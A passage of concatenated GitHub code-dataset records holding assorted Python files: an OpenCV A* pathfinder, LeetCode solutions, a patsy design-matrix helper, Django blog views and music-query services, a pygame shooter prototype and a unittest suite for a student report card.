xC):\n x = keys[i-1]\n elif i == 0:\n x = keys[i] \n else:\n x = keys[i]\n break\n\n else:\n x = keys[-i]\n \n # For y\n for i in range(len(self.dict[x])):\n if yC <= self.dict[x][i]:\n if abs(self.dict[x][i] - yC) >= abs(self.dict[x][i-1] - yC):\n y = self.dict[x][i-1]\n \n elif i == 0:\n y = self.dict[x][i] \n else:\n y = self.dict[x][i]\n break\n\n else:\n y = self.dict[x][-1]\n\n # print(x, y)\n return (x, y) \n\n def pathVerify(self, coordinate):\n if self.euclidean(coordinate, self.pathList[-1]) < 140:\n return True\n return False\n \n def euclidean(self, current, goal):\n # To find euclidean distance\n x1, y1 = current\n x2, y2 = goal\n res = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n # print(current, (x2, y2))\n return round(res)\n\n def neighborClean(self, cord_list, comparator):\n cord_list.sort()\n maxVal = max(cord_list)\n minVal = min(cord_list)\n avgCom = comparator\n\n if (maxVal - minVal) > 200:\n if (maxVal - avgCom) > (avgCom - minVal):\n cord_list.pop(-1)\n else:\n cord_list.pop(0)\n \n return cord_list\n\n # Inclusive of digonals also\n def neighbors(self, current):\n # Only when current is part of array coordinates\n neighborList = []\n \n xC, yC = self.arrayCord(current)\n # print((xC, yC))\n keys = list(self.dict.keys())\n # For x when y is constant\n if xC in keys:\n # print(\"In Keys\", current)\n loc = keys.index(xC)\n if loc > 0 and loc < len(keys) - 1:\n x_list = [keys[loc - 1], keys[loc], keys[loc + 1]]\n elif loc == 0:\n x_list = [keys[loc], keys[loc + 1]]\n elif loc == len(keys) -1:\n x_list = [keys[loc - 1], keys[loc]]\n \n # print(x_list)\n # For y when x is constant\n y_all = []\n for i in x_list:\n\n if yC in self.dict[i]:\n loc = self.dict[i].index(yC)\n yCI = yC\n else:\n _, yCI = self.arrayCord((i, yC))\n if abs(yCI - yC)/max(yCI, yC) > 0.2:\n r = x_list.index(i)\n x_list.pop(r)\n continue\n \n loc = self.dict[i].index(yCI)\n if loc > 0 and loc < len(self.dict[i]) - 1:\n y_list = [self.dict[i][loc - 1], self.dict[i][loc], self.dict[i][loc + 1]]\n elif loc == 0 and len(self.dict[i]) >= 2:\n y_list = [self.dict[i][loc], self.dict[i][loc + 1]]\n elif loc == 0 and len(self.dict[i]) < 2:\n y_list = [self.dict[i][loc]]\n elif loc == len(self.dict[i]) -1:\n y_list = [self.dict[i][loc - 1], self.dict[i][loc]]\n \n y_list = self.neighborClean(y_list, self.dict[i][loc])\n y_all.extend(y_list)\n # print(i, y_list)\n neighborList = [self.arrayCord((j, k)) for j in x_list for k in set((y_all))]\n \n neighborSet = set((neighborList))\n # print((xC, yC) in neighborSet)\n return neighborSet\n\n def hVal(self): \n neighbors_list = self.neighbors(self.pathList[-1])\n # print(neighbors_list)\n h_dict = {}\n for i in neighbors_list:\n dist = self.euclidean(i, self.goal)\n h_dict[i] = dist\n # print(i, self.euclidean(i))\n while True:\n cord = min(h_dict.keys(), key=(lambda k: h_dict[k]))\n if self.pathVerify(cord):\n break\n else:\n h_dict.pop(cord)\n\n self.pathDict[self.g] = cord\n self.pathList.append(cord)\n\n return h_dict[cord]\n\n def pathCalc(self):\n self.g += 1\n self.h = self.hVal()\n self.f = self.g + self.h\n if self.h == 0:\n # print(self.h)\n return False\n elif self.g > 1:\n if self.pathDict[self.g] == self.pathDict[self.g-2]:\n print(\"Repetation\")\n return False\n\n return True\n\ndef findPath(img_path, file_path, start, goal):\n \n path = A_Star(file_path, start, goal)\n\n flag = True\n while flag:\n flag = path.pathCalc()\n\n img = cv2.imread(img_path)\n # print(path.pathDict)\n\n for i in path.pathDict.values():\n cv2.circle(img, i, 5, (0, 250, 255), 10)\n\n for i in (path.arrayCord(start), path.arrayCord(goal)):\n cv2.putText(\n img, #numpy array on which text is written\n str(i), #text\n i, #position at which writing has to start\n cv2.FONT_HERSHEY_SIMPLEX, #font family\n 1, #font size\n (255, 255, 255, 255), #font color\n 1)\n\n cv2.circle(img, start, 5, (0, 250, 0), 10)\n cv2.circle(img, goal, 5, (0, 0, 255), 10)\n\n cv2.imshow(\"image\", img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n cv2.imwrite(r'Pics\\Output_F1.png', img)\n\n return path.pathDict\n\nif __name__ == '__main__':\n\n img = r'GitFiles\\FlipKart_Nav\\Pics\\Blank_1.png'\n file = r'GitFiles\\FlipKart_Nav\\Files\\Co-ordinates_1.csv'\n inp_1 = (200, 800)\n inp_2 = (850, 105)\n\n \n findPath(img, file, inp_1, inp_2)\n ","repo_name":"Samar2173/FlipKart_Nav","sub_path":"Code/astar_cv2_diagonals.py","file_name":"astar_cv2_diagonals.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36142724893","text":"'''\nkeys:\nSolutions:\nSimilar:\nT:\nS:\n'''\nfrom typing import List\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n ##### TODO: educative.io version, need to calculate the distance\n def detectCycle3(self, head):\n cycle_len = 0\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n cycle_len = self.cycle_len_cal(slow)\n break\n return self.find_start(head, cycle_len)\n\n def cycle_len_cal(self, slow):\n # calculate the length of the cycle\n cur = slow\n len_ = 0\n while True:\n cur = cur.next\n len_ += 1\n if cur == slow:\n break\n return len_\n\n def find_start(self, head, cycle_len):\n pt1, pt2 = head, head\n while cycle_len > 0:\n pt2 = pt2.next\n cycle_len -= 1\n while pt1 != pt2:\n pt1 = pt1.next\n pt2 = pt2.next\n return pt1\n\n\n\n # The method to go...\n ##### TODO: two pointer (fast and slow)\n # O(1) for S and O(n) for T\n def getIntersect(self, head):\n slow = head\n fast = head\n\n # A fast pointer will either loop around a cycle and meet the slow\n # pointer or reach the `null` at the end of a non-cyclic list.\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n return slow\n\n return None\n\n def detectCycle1(self, head):\n if head is None:\n return None\n\n # If there is a cycle, the fast/slow pointers will intersect at some\n # node. Otherwise, there is no cycle, so we cannot find an entrance to\n # a cycle. \n intersect = self.getIntersect(head)\n if intersect is None:\n return None\n\n # To find the entrance to the cycle, we have two pointers traverse at\n # the same speed -- one from the front of the list, and the other from\n # the point of intersection. When they intersect, the point is the entrance\n ptr1 = head\n ptr2 = intersect\n while ptr1 != ptr2:\n ptr1 = ptr1.next\n ptr2 = ptr2.next\n\n return ptr1\n\n\n ##### TODO: hashset\n # O(n) for S and T\n def detectCycle(self, head: ListNode) -> ListNode:\n visited = set()\n node = head\n while node is not None:\n if node in visited:\n return node\n else:\n visited.add(node)\n node = node.next\n return node\n\n\n\n ##### TODO: improved pointer (fast and slow)\n # this is hard to think of \n # O(1) for S and O(n) for T\n def detectCycle2(self, head):\n slow = head; fast = head\n while fast is not None and fast.next is not None:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n while slow != head:\n slow = slow.next # it's actually the originial fast pointer\n head = head.next # it's the head\n return slow\n return None\n\n\n \n\n\n\n","repo_name":"qinzhouhit/leetcode","sub_path":"fast_slow_pointers/142detectCycle.py","file_name":"142detectCycle.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28633382756","text":"import numpy as np\nimport pandas as pd\nimport patsy\nfrom collections import OrderedDict\n\ndef design_matrix(formula, data):\n \"\"\"\n Build the design matrix t-contrasts and F-contrasts given the formula and the dataframe.\n Remark: use `patsy.dmatrix(formula, data=data)`\n\n Parameters\n ----------\n formula, str\n data, DataFrame\n\n Returns\n -------\n X: array\n the design matrix\n t_contrasts: OrderedDict key=colname, val=array (P,)\n remark: len(t_contrasts) == X.shape[1]\n f_contrasts: OrderedDict key=term name in formula, val=array (P, P)\n not documented.\n \"\"\"\n # Build design matrix\n dmat = patsy.dmatrix(formula, data=data)\n\n # Build T-contrasts\n t_contrasts = OrderedDict()\n\n for idx, name in enumerate(dmat.design_info.column_names):\n cont = np.zeros(dmat.shape[1])\n cont[idx] = 1\n t_contrasts[name] = cont\n\n # Build F-contrasts\n f_contrasts = OrderedDict()\n\n for term, slice in dmat.design_info.term_name_slices.items():\n # if term == \"site\":\n # break\n cont = np.zeros((dmat.shape[1], dmat.shape[1]))\n indices = np.arange(slice.start, slice.stop)\n cont[indices, indices] = 1\n f_contrasts[term] = cont\n\n return np.asarray(dmat), t_contrasts, f_contrasts\n","repo_name":"neurospin/pylearn-mulm","sub_path":"mulm/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"6867401253","text":"\"\"\"\nThis module provide functions to balance data.\n\"\"\"\nimport numpy\n\n\ndef balance_data(x, y):\n \"\"\"\n Balance data to be representative.\n\n Note: When balancing the data, the number os data and labels tends to\n decrease because the extra instances of some classes will be removed.\n\n :param x:\n Data or paths.\n :param y:\n Labels/classes.\n\n :return: tuple (numpy.ndarray, numpy.ndarray)\n x, y balanced\n \"\"\"\n dataset = list(zip(x, y))\n unique, counts = numpy.unique(y, return_counts=True)\n max_n_instances = min(counts)\n paths_per_label = dict()\n for label in unique:\n paths_per_label[label] = list(filter(lambda d: d[1] == label, dataset))\n x = []\n y = []\n for label in paths_per_label:\n for inst, lbl in paths_per_label[label][:max_n_instances]:\n x.append(inst)\n y.append(lbl)\n\n return numpy.asarray(x), numpy.asarray(y)\n","repo_name":"ajilim/spoken-language-identification","sub_path":"util/datasets/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25008771847","text":"from django.db import connection\nfrom .models import Group, Album, Track\n\ndef get_groups(**params):\n group_uuids = params.get('group_uuids', None)\n genre_uuids = params.get('genre_uuids', None)\n\n sql_query = \"select g.* from groups as g\"\n if group_uuids and genre_uuids:\n group_uuids = map(lambda s: \"'{}'\".format(s), group_uuids)\n genre_uuids = map(lambda s: \"'{}'\".format(s), genre_uuids)\n sql_query += ' where g.group_uuid in ({}) and g.genre in ({})'. \\\n format(','.join(group_uuids), ','.join(genre_uuids))\n elif group_uuids:\n group_uuids = map(lambda s: \"'{}'\".format(s), group_uuids)\n sql_query += ' where g.group_uuid in ({})'. \\\n format(','.join(group_uuids))\n elif genre_uuids:\n genre_uuids = map(lambda s: \"'{}'\".format(s), genre_uuids)\n sql_query += ' where g.genre in ({})'. \\\n format(','.join(genre_uuids))\n sql_query += ';'\n group_list = Group.objects.raw(sql_query)\n\n return group_list\n\ndef get_albums(**params):\n album_uuids = params.get('album_uuids', None)\n genre_uuids = params.get('genre_uuids', None)\n group_uuids = params.get('group_uuids', None)\n\n sql_query = \"select a.* from albums as a\"\n if album_uuids and genre_uuids:\n album_uuids = map(lambda s: \"'{}'\".format(s), album_uuids)\n genre_uuids = map(lambda s: \"'{}'\".format(s), genre_uuids)\n sql_query += ' where a.album_uuid in ({}) and a.genre in ({})'. \\\n format(','.join(album_uuids), ','.join(genre_uuids))\n elif album_uuids:\n album_uuids = map(lambda s: \"'{}'\".format(s), album_uuids)\n sql_query += ' where a.album_uuid in ({})'. \\\n format(','.join(album_uuids))\n elif genre_uuids:\n genre_uuids = map(lambda s: \"'{}'\".format(s), genre_uuids)\n sql_query += ' where a.genre in ({})'. \\\n format(','.join(genre_uuids))\n elif group_uuids:\n group_uuids = map(lambda s: \"'{}'\".format(s), group_uuids)\n sql_query += ' where a.album_group in ({})'. \\\n format(','.join(group_uuids))\n sql_query += ';'\n album_list = Album.objects.raw(sql_query)\n\n return album_list\n\ndef get_tracks(**params):\n tracks_uuids = params.get('tracks_uuids', None)\n albums_uuids = params.get('albums_uuids', None)\n sql_query = \"select t.* from tracks as t\"\n if tracks_uuids and albums_uuids:\n tracks_uuids = map(lambda s: \"'{}'\".format(s), tracks_uuids)\n albums_uuids = map(lambda s: \"'{}'\".format(s), albums_uuids)\n sql_query += ' where t.track_uuid in ({}) and t.album in ({})'. \\\n format(','.join(album_uuids), ','.join(tracks_uuids))\n elif tracks_uuids:\n tracks_uuids = map(lambda s: \"'{}'\".format(s), tracks_uuids)\n sql_query += ' where t.track_uuid in ({})'. \\\n format(','.join(tracks_uuids))\n elif albums_uuids:\n albums_uuids = map(lambda s: \"'{}'\".format(s), albums_uuids)\n sql_query += ' where t.album in ({})'. \\\n format(','.join(albums_uuids))\n sql_query += ';'\n track_list = Track.objects.raw(sql_query)\n\n return track_list","repo_name":"and227/musexplorer-back","sub_path":"src/apps/muzservice/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16886871062","text":"from django.shortcuts import render, redirect, get_object_or_404\n\nfrom .models import Blog\nfrom .forms import NewBlogForm, UpdateBlogForm, DeleteBlogForm\n\n\ndef index(request):\n blogs = Blog.objects.all()\n context = {'blogs': blogs}\n return render(request, 'blogs/index.html', context=context)\n\n\ndef details(req, id):\n blog = get_object_or_404(Blog, id=id)\n context = {'blog': blog}\n return render(req, 'blogs/details.html', context=context)\n\n\ndef add_blog(req):\n if req.method == 'POST':\n posted_form = NewBlogForm(req.POST)\n if posted_form.is_valid():\n posted_form.save()\n return redirect('/')\n\n new_form = NewBlogForm()\n return render(req, 'blogs/addBlog.html', {'form': new_form})\n\n\ndef delete_blog(req):\n if req.method == 'POST':\n delete_form = DeleteBlogForm(req.POST)\n if delete_form.is_valid():\n id = delete_form.data.get('id')\n blog = get_object_or_404(Blog, id=id)\n blog.delete()\n return redirect('/')\n\n\ndef update_blog(req, id):\n if req.method == 'POST':\n oldBlog = Blog.objects.get(id=id)\n\n setattr(oldBlog, 'title', req.POST.get('title'))\n setattr(oldBlog, 'author', req.POST.get('author'))\n setattr(oldBlog, 'body', req.POST.get('body'))\n oldBlog.save()\n\n return redirect('/')\n\n updateBlog = Blog.objects.get(id=id)\n context = {'blog': updateBlog}\n return render(req, 'blogs/updateBlog.html', context=context)\n","repo_name":"AluBhorta/django-intro","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39277024283","text":"#!/usr/bin/python3\ndef safe_print_list(my_list=[], x=0):\n if not my_list or x == 0:\n print()\n return (0)\n try:\n for idx in range(x):\n print(my_list[idx], end=\"\")\n except:\n idx = idx - 1\n finally:\n print()\n return(idx + 1)\n","repo_name":"LDoualito/holbertonschool-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29820985557","text":"score = [0, 0]\nfor _ in range(int(input())):\n a, b = map(int, input().split())\n if a > b:\n score[0] += (a + b)\n elif a < b:\n score[1] += (a + b)\n else:\n score[0] += a\n score[1] += b\nprint(score[0], score[1])","repo_name":"ppirae/BOJ","sub_path":"prob_1000~9999/5607_問題 1.py","file_name":"5607_問題 1.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4257740710","text":"import pygame\nimport time\n\npygame.init()\nrun = True\n# window setup\nwin = pygame.display.set_mode((500, 500))\nscreen_width = 500\n# window name\npygame.display.set_caption(\"Enemy Testing Grounds\")\nclock = pygame.time.Clock()\nwalkCount = 0\n\nwalkRight = [pygame.image.load('R1.png'), pygame.image.load('R2.png'), pygame.image.load('R3.png'),\n pygame.image.load('R4.png'), pygame.image.load('R5.png'), pygame.image.load('R6.png'),\n pygame.image.load('R7.png'), pygame.image.load('R8.png'), pygame.image.load('R9.png')]\nwalkLeft = [pygame.image.load('L1.png'), pygame.image.load('L2.png'), pygame.image.load('L3.png'),\n pygame.image.load('L4.png'), pygame.image.load('L5.png'), pygame.image.load('L6.png'),\n pygame.image.load('L7.png'), pygame.image.load('L8.png'), pygame.image.load('L9.png')]\nbg = pygame.image.load('bg.jpg')\nchar = pygame.image.load('standing.png')\n\nclock = pygame.time.Clock()\n\nscore = 0\n\nbulletSound = pygame.mixer.Sound('bulletS.wav')\nhitSound = pygame.mixer.Sound('hitS.wav')\nmusic = pygame.mixer.music.load('music.mp3')\n#pygame.mixer.music.play(-1)\n\nclass player(object):\n # characters location and values\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.walkCount = 0\n self.vel = 3\n self.isJump = False\n self.left = False\n self.right = False\n self.jumpCount = 10\n self.standing = True\n self.hitbox = (self.x + 17, self.y + 11, 29, 52)\n self.score = score\n\n def draw(self, win):\n if self.walkCount + 1 >= 27:\n self.walkCount = 0\n if self.y > 410:\n self.y = 410\n if not (self.standing):\n if self.left:\n win.blit(walkLeft[self.walkCount // 3], (self.x, self.y))\n self.walkCount += 1\n elif self.right:\n win.blit(walkRight[self.walkCount // 3], (self.x, self.y))\n self.walkCount += 1\n else:\n if self.right:\n win.blit(walkRight[0], (self.x, self.y))\n else:\n win.blit(walkLeft[0], (self.x, self.y))\n self.hitbox = (self.x + 17, self.y + 11, 29, 52)\n pygame.draw.rect(win, (255, 0, 0), self.hitbox, 2)\n def hit(self):\n self.y = 410\n self.x = 60\n self.walkCount = 0\n font1 = pygame.font.SysFont('comicsans', 30)\n text = font1.render('Hit', 1, (100, 22, 117))\n win.blit(text, (self.x, self.y+10))\n pygame.display.update()\n i = 0\n while i < 100:\n pygame.time.delay(10)\n i += 1\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n i = 301\n pygame.quit()\nclass enemy(object):\n enemyR = [pygame.image.load('R1E.png'), pygame.image.load('R2E.png'), pygame.image.load('R3E.png'),\n pygame.image.load('R4E.png'), pygame.image.load('R5E.png'), pygame.image.load('R6E.png'),\n pygame.image.load('R7E.png'), pygame.image.load('R8E.png')]\n enemyL = [pygame.image.load('L1E.png'), pygame.image.load('L2E.png'), pygame.image.load('L3E.png'),\n pygame.image.load('L4E.png'), pygame.image.load('L5E.png'), pygame.image.load('L6E.png'),\n pygame.image.load('L7E.png'), pygame.image.load('L8E.png')]\n enemyRattack = [pygame.image.load('R9E.png'), pygame.image.load('R10E.png'), pygame.image.load('R11E.png')]\n enemyLattack = [pygame.image.load('L9E.png'), pygame.image.load('L10E.png'), pygame.image.load('L11E.png')]\n\n def __init__(self, startx, y, width, height, end, isalive):\n self.alive = isalive\n self.start = startx\n self.x = startx\n self.y = y\n self.width = width\n self.height = height\n self.end = end\n self.path = [self.start, self.end]\n self.walkCount = 0\n self.vel = 3\n self.hitbox = (self.x + 17, self.y + 2, 31, 57)\n self.tod = 0\n self.health = 12\n\n\n\n def draw(self, win):\n if self.alive == True:\n self.move()\n pygame.draw.line(win, (0, 0, 255), (0, 0), (639, 479))\n if self.walkCount >= 16:\n self.walkCount = 0\n if self.vel > 0:\n win.blit(self.enemyR[self.walkCount // 4], (self.x, self.y))\n self.walkCount += 1\n else:\n win.blit(self.enemyL[self.walkCount // 4], (self.x, self.y))\n self.walkCount += 1\n pygame.draw.rect(win, (255, 0, 0), (self.hitbox[0], self.hitbox[1] - 20, 50, 10))\n pygame.draw.rect(win, (0, 128, 0), (self.hitbox[0], self.hitbox[1] - 20, 50 - (5 * (10 - self.health)), 10))\n #https://www.techwithtim.net/tutorials/game-development-with-python/pygame-tutorial/scoring-health-bars/\n self.hitbox = (self.x + 17, self.y + 2, 31, 57)\n pygame.draw.rect(win, (100, 22, 117), self.hitbox, 2)\n else:\n self.hitbox = (0,0,0,0)\n\n\n def move(self):\n self.x += self.vel\n if self.x < self.start:\n self.x = self.start\n self.walkCount = 0\n if self.x > self.end:\n self.x = self.end\n self.walkCount = 0\n if man.x >= self.path[0] and man.x <= self.path[1]:\n if man.x <= self.x and man.y == self.y:\n #print(\"moving left\")\n if self.vel > 0:\n self.vel = self.vel * -1\n\n elif man.x >= self.x and man.y == self.y:\n #print(\"moving right\")\n if self.vel < 0:\n self.vel = self.vel * -1\n\n else:\n self.walkPath()\n def walkPath(self):\n #print(\"Patroling\")\n if self.x >= self.path[1]:\n self.vel = self.vel * -1\n self.walkCount = 0\n elif self.x == self.path[0]:\n self.vel = self.vel*-1\n self.walkCount = 0\n def attack(self):\n if man.x < self.x:\n win.blit(self.enemyL[self.walkCount // 4], (self.x, self.y))\n else:\n win.blit(self.enemyRattack[self.walkCount // 4], (self.x, self.y))\n def hit(self):\n #print(\"Hit\")\n hitSound.play()\n self.health -= 4\n print(self.health)\n if(self.health <= 0):\n self.alive = False\n self.ressurect()\n def ressurect(self):\n print(\"Begining Necromancy\")\n self.currentTime = pygame.time.get_ticks()\n self.passedTime = self.currentTime - self.tod\n print(self.tod)\n print(self.passedTime)\n print(self.currentTime)\n if(self.passedTime >= self.tod+5000):\n print(self.passedTime)\n print(\"He is reborn\")\n self.alive = True\n\nclass projectile(object):\n def __init__(self, x, y, radius, color, facing):\n self.x = x\n self.y = y\n self.radius = radius\n self.color = color\n self.facing = facing\n self.vel = 8 * facing\n\n def draw(self, win):\n pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)\n\ndef writeScore():\n font1 = pygame.font.SysFont('comicsans', 30)\n scoreOut = font1.render(\"Score: \" + str(score), 1, (100, 22, 117))\n win.blit(scoreOut, (50,150))\n\ndef redrawGameWindow():\n win.blit(bg, (0, 0))\n man.draw(win)\n goblin.draw(win)\n writeScore()\n for bullet in bullets:\n bullet.draw(win)\n\n pygame.display.update()\n\n\n# mainloop\nman = player(50, 410, 64, 64)\ngoblin = enemy(100, 410, 64, 64, 450, True)\nshootLoop = 0\nbullets = []\nrun = True\nwhile run:\n clock.tick(27)\n\n if man.hitbox[1] < goblin.hitbox[1] + goblin.hitbox[3] and man.hitbox[1] + man.hitbox[3] > goblin.hitbox[1]:\n if man.hitbox[0] + man.hitbox[2] > goblin.hitbox[0] and man.hitbox[0] < goblin.hitbox[0] + goblin.hitbox[2]:\n man.hit()\n goblin.health = 12\n writeScore()\n score -= 2\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n if shootLoop > 0:\n shootLoop += 1\n if shootLoop > 3:\n shootLoop = 0\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n for bullet in bullets:\n if bullet.y - bullet.radius < goblin.hitbox[1] + goblin.hitbox[3] and bullet.y + bullet.radius > goblin.hitbox[1]:\n if bullet.x + bullet.radius > goblin.hitbox[0] and bullet.x - bullet.radius < goblin.hitbox[0] + \\\n goblin.hitbox[2]:\n goblin.hit()\n goblin.tod = pygame.time.get_ticks()\n score += 3\n bullets.pop(bullets.index(bullet))\n\n if bullet.x < 500 and bullet.x > 0:\n bullet.x += bullet.vel\n else:\n bullets.pop(bullets.index(bullet))\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_SPACE] and shootLoop == 0:\n bulletSound.play()\n if man.left:\n facing = -1\n else:\n facing = 1\n\n if len(bullets) < 2:\n bullets.append(\n projectile(round(man.x + man.width // 2), round(man.y + man.height // 2), 6, (0, 0, 0), facing))\n\n shootLoop = 1\n if keys[pygame.K_LEFT] and man.x > man.vel:\n man.x -= man.vel\n man.left = True\n man.right = False\n man.standing = False\n elif keys[pygame.K_RIGHT] and man.x < 500 - man.width - man.vel:\n man.x += man.vel\n man.right = True\n man.left = False\n man.standing = False\n else:\n man.standing = True\n man.walkCount = 0\n\n if not man.isJump:\n if keys[pygame.K_UP]:\n man.isJump = True\n man.right = False\n man.left = False\n man.walkCount = 0\n else:\n if man.jumpCount >= -10:\n neg = 1\n if man.jumpCount < 0:\n neg = -1\n man.y -= (man.jumpCount ** 2) * 0.5 * neg\n man.jumpCount -= 1\n else:\n man.isJump = False\n man.jumpCount = 10\n redrawGameWindow()\n\npygame.quit()\n","repo_name":"rileymize1/SoftEngGameProjSp2021","sub_path":"Enemy playground.py","file_name":"Enemy playground.py","file_ext":"py","file_size_in_byte":10184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"43519649635","text":"from project.student_report_card import StudentReportCard\nfrom unittest import TestCase, main\n\n\nclass TestStudent(TestCase):\n\n def setUp(self):\n self.student = StudentReportCard(\"Tamer\", 12)\n\n def test_successful_year(self):\n self.student.school_year = 1\n\n self.assertEqual(1, self.student.school_year)\n\n def test_successful_initialization(self):\n self.assertEqual(\"Tamer\", self.student.student_name)\n self.assertEqual(12, self.student.school_year)\n self.assertEqual({}, self.student.grades_by_subject)\n\n def test_for_error_with_empty_student_name(self):\n with self.assertRaises(ValueError) as ve:\n self.student.student_name = \"\"\n self.assertEqual(\"Student Name cannot be an empty string!\", str(ve.exception))\n\n def test_for_error_with_wrong_school_year(self):\n with self.assertRaises(ValueError) as ve:\n self.student.school_year = 13\n self.assertEqual(\"School Year must be between 1 and 12!\", str(ve.exception))\n\n def test_successful_add_grade(self):\n subject = \"123\"\n grade = 6.00\n self.student.add_grade(subject, grade)\n self.assertEqual({\"123\": [6.00]}, self.student.grades_by_subject)\n self.student.add_grade(subject, grade)\n self.assertEqual({\"123\": [6.00, 6.00]}, self.student.grades_by_subject)\n self.student.add_grade(\"456\", 6.00)\n self.assertEqual({\"123\": [6.00, 6.00], \"456\": [6.00]}, self.student.grades_by_subject)\n\n def test_average_grade_by_subject(self):\n self.student.add_grade(\"123\", 6.00)\n self.student.add_grade(\"456\", 6.00)\n self.student.add_grade(\"789\", 6.00)\n self.assertEqual([6.00], self.student.grades_by_subject[\"123\"])\n self.assertEqual([6.00], self.student.grades_by_subject[\"456\"])\n self.assertEqual([6.00], self.student.grades_by_subject[\"789\"])\n self.assertEqual(1, len(self.student.grades_by_subject[\"123\"]))\n self.assertEqual(\"123: 6.00\\n\"\n \"456: 6.00\\n\"\n \"789: 6.00\", self.student.average_grade_by_subject())\n\n def test_empty_report_average_grade(self):\n self.assertEqual(\"\", self.student.average_grade_by_subject())\n\n def test_average_grade_for_all_subjects(self):\n self.student.add_grade(\"123\", 6.00)\n self.student.add_grade(\"456\", 6.00)\n actual = self.student.average_grade_for_all_subjects()\n expected = \"Average Grade: 6.00\"\n self.assertEqual(expected, actual)\n self.assertEqual([6.00], self.student.grades_by_subject[\"123\"])\n self.assertEqual([6.00], self.student.grades_by_subject[\"456\"])\n self.assertEqual(1, len(self.student.grades_by_subject[\"123\"]))\n\n def test_repr(self):\n self.student.add_grade(\"P - Basic\", 6.00)\n self.student.add_grade(\"P - Basic\", 6.00)\n self.student.add_grade(\"P - Fund\", 6.00)\n\n result = self.student.__repr__()\n\n self.assertEqual(\"Name: Tamer\\n\"\n \"Year: 12\\n\"\n \"----------\\n\"\n f\"{self.student.average_grade_by_subject()}\\n\"\n \"----------\\n\"\n f\"{self.student.average_grade_for_all_subjects()}\", result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kumchovylcho/softuni","sub_path":"Advanced - Python/Python OOP - Exams/Python OOP Retake Exam - 22 Aug 2020/project_test/project/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"6682405061","text":"#!/usr/bin/env python3\n\n\"\"\"\nWrite a script that checks the system log file and reports if there are any\ncron jobs that are not run by root. The script should report the username of\nthe cron job and the command that is run by the cron job. The script should\nreport if there are no cron jobs that are not run by root.\n\n\"\"\"\n\n\nimport re\nimport sys\n\nlogfile = sys.argv[1]\nusernames = []\nwith open(logfile) as f:\n for line in f:\n if \"CRON\" not in line:\n continue\n pattern = r\"USER \\((\\w)\\)$\"\n result = re.search(pattern, line)\n if result is None:\n continue\n name = result[1]\n if name != \"root\":\n usernames.append(name)\n \nprint(usernames)\n \n# Path: Interacción con PC\\check_cron.py\n\n","repo_name":"Alphonsus411/Proyectos-Python","sub_path":"Interacción con PC/check_cron.py","file_name":"check_cron.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"18988576807","text":"import pytest\nfrom common.utils import partition_list\n\n\n@pytest.mark.parametrize(\n \"iterable,chunk_size,expected\",\n [\n ([1, 2, 3, 4, 5], 2, [[1, 2], [3, 4], [5]]),\n ([1, 2, 3, 4], 2, [[1, 2], [3, 4]]),\n ([1, 2], 3, [[1, 2]]),\n ],\n)\ndef test_partition_list(client, iterable, chunk_size, expected) -> None:\n assert list(partition_list(iterable, chunk_size)) == expected\n","repo_name":"r2r2/strana_backend","sub_path":"cabinet/old_tests/unittests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10005752205","text":"# distances is a 2D list, where its inner list index corresponds to the worker ID; But each list is sorted based the distance between the worker and all bikes in an descending manner.\n# Then another sorted of process after the above, is to place all the popped out smallest distance for each worker to a heap. \n# The above distances list is still useful in that whenever we have a conflict for a user, we can find the next best option for the current user.\nclass Solution:\n def assignBikes(self, workers: List[List[int]], bikes: List[List[int]]) -> List[int]:\n # get the minimum distance from each worker to each bike\n W = len(workers)\n B = len(bikes)\n distances = []\n \n for i in range(W):\n distances.append([])\n for j in range(B):\n m_distance = abs(bikes[j][0] - workers[i][0]) + abs(bikes[j][1] - workers[i][1])\n distances[-1].append((m_distance, i, j))\n 